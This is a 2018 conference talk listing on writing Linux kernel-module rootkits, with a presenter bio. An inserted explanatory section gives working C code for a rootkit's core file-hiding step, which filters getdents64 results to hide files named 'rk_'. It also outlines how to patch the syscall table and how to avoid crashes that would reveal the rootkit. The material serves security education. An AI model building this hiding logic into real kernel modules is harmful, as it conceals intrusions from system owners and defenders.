Kernel Mod Rootkits on Modern Linux Systems

Presented at CarolinaCon 14 (2018), April 14, 2018, 4 p.m. (60 minutes)

You can find a lot of primers with some Google-fu on writing Linux rootkits. Unfortunately, most of them are outdated and have techniques that just don't work anymore. This talk will be specifically focused on writing a kernel mod rootkit on a modern Linux kernel (the latest version of Linux Mint, to be exact). It will specifically focus on hooking syscalls and how to do so in a simple, reproducible way. For this talk I'll be releasing a simple but effective kernel mod rootkit and instructions on how to modify it for your own needs.
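The classic thing a syscall-hooking rootkit does once it owns an entry in sys_call_table is wrap getdents64 and strip directory entries it wants hidden before they reach userspace. The kernel-side plumbing the talk covers (finding the table on a kernel that no longer exports it, clearing the write-protect bit in CR0 while patching, copying the caller's buffer in and out with copy_from_user/copy_to_user) cannot run outside a module, but the filtering step itself is plain C over the kernel's linux_dirent64 layout. The example below is added here and is not the presenter's released module or any code from the talk; the record layout matches the kernel's struct linux_dirent64, the hidden-name prefix "rk_" and the directory contents are constructed for illustration.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Userspace mirror of the kernel's struct linux_dirent64 (include/linux/dirent.h).
 * d_reclen is the full record size, padded to an 8-byte boundary; d_name is
 * NUL-terminated and immediately follows d_type. */
struct linux_dirent64 {
    uint64_t d_ino;
    int64_t  d_off;
    uint16_t d_reclen;
    uint8_t  d_type;
    char     d_name[];
};

/* The core of a getdents64 hook: given the byte buffer the real syscall filled
 * in and its return value `len`, drop every record whose name starts with
 * `prefix`, compact the survivors in place, and return the new length (what the
 * hook hands back to the caller instead of the original return value). */
long hide_dirents_with_prefix(char *buf, long len, const char *prefix)
{
    size_t plen = strlen(prefix);
    long rd = 0, wr = 0;

    while (rd < len) {
        struct linux_dirent64 *d = (struct linux_dirent64 *)(buf + rd);
        uint16_t reclen = d->d_reclen;

        /* A too-small or oversized d_reclen means a corrupt buffer; stop rather
         * than read past the end of what the syscall actually returned. */
        if (reclen < offsetof(struct linux_dirent64, d_name) + 1 || rd + reclen > len)
            break;

        if (strncmp(d->d_name, prefix, plen) != 0) {
            if (wr != rd)
                memmove(buf + wr, buf + rd, reclen);
            wr += reclen;
        }
        rd += reclen;
    }
    return wr;
}

/* Test-data builder (constructed, not real kernel output): append one record
 * at `off` and return its size, using the same 8-byte padding the kernel does. */
long append_dirent(char *buf, long off, uint64_t ino, uint8_t type, const char *name)
{
    size_t namelen = strlen(name) + 1;
    size_t reclen = (offsetof(struct linux_dirent64, d_name) + namelen + 7) & ~(size_t)7;
    struct linux_dirent64 *d = (struct linux_dirent64 *)(buf + off);

    memset(d, 0, reclen);
    d->d_ino = ino;
    d->d_off = (int64_t)(off + reclen);
    d->d_reclen = (uint16_t)reclen;
    d->d_type = type;
    memcpy(d->d_name, name, namelen);
    return (long)reclen;
}

/* Walk a dirent buffer and write its names, comma separated, into `out`.
 * Returns the number of records seen. */
int list_dirent_names(const char *buf, long len, char *out, size_t outsz)
{
    int n = 0;
    long rd = 0;
    out[0] = '\0';
    while (rd < len) {
        const struct linux_dirent64 *d = (const struct linux_dirent64 *)(buf + rd);
        if (d->d_reclen == 0)
            break;
        if (n)
            strncat(out, ",", outsz - strlen(out) - 1);
        strncat(out, d->d_name, outsz - strlen(out) - 1);
        n++;
        rd += d->d_reclen;
    }
    return n;
}

/* Simulate one getdents64 call on a constructed directory that holds two files
 * the rootkit wants hidden (prefix "rk_"). Returns the number of visible entries
 * and writes their names into `out`. */
int demo_hidden_listing(char *out, size_t outsz)
{
    uint64_t raw[64];                 /* 8-byte aligned backing store for the records */
    char *buf = (char *)raw;
    long len = 0;
    const char *names[] = { ".", "..", "passwd", "rk_hidden.txt", "rk_tool", "notes.txt" };

    for (size_t i = 0; i < sizeof names / sizeof names[0]; i++)
        len += append_dirent(buf, len, 1000 + i, i < 2 ? 4 : 8, names[i]); /* 4 = DT_DIR, 8 = DT_REG */

    len = hide_dirents_with_prefix(buf, len, "rk_");
    return list_dirent_names(buf, len, out, outsz);
}

int main(void)
{
    char out[256];
    int n = demo_hidden_listing(out, sizeof out);
    printf("%d entries visible: %s\n", n, out);
    return 0;
}
```

In a real module the hook calls the saved original getdents64 first, copies the user buffer into kernel memory, runs the same compaction, copies the shortened buffer back, and returns the new length; on x86-64 kernels since 4.17 the syscall entry receives a struct pt_regs, so the buffer pointer and size come from regs->si and regs->dx rather than named arguments. The bounds check on d_reclen matters: a hook that trusts the record length blindly is one corrupt buffer away from a kernel oops that advertises its presence.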


Presenters:

  • Alex Caceres
    Alejandro (Alex) Caceres is the founder and owner of Hyperion Gray, LLC, a small web security and software R&D company based in North Carolina. Alex attended Duke University, where he received a B.S. in both Physics and Mathematics and began working with distributed computing in the context of massive simulations of heavy ion collisions. A hacker and open source developer at heart, he worked as a computer network operations engineer and software developer at an information security consulting firm before starting Hyperion Gray in January 2013 with the release of his popular open source project PunkSPIDER (now punk.sh), which leverages distributed computing for mass-scale web vulnerability detection. Alex has extensive experience with web application hacking, penetration testing, and securing applications and systems against vulnerabilities. He has designed and taught several courses on these subjects, one of which has been published as an e-book and in print. He is currently the tech lead of Hyperion Gray's research team on the DARPA Memex project, and has been the tech lead on several other DARPA-funded projects as well. He has been a speaker and panel moderator at several major security conferences, including OWASP AppSec USA, ShmooCon, DEF CON, DerbyCon and CarolinaCon.
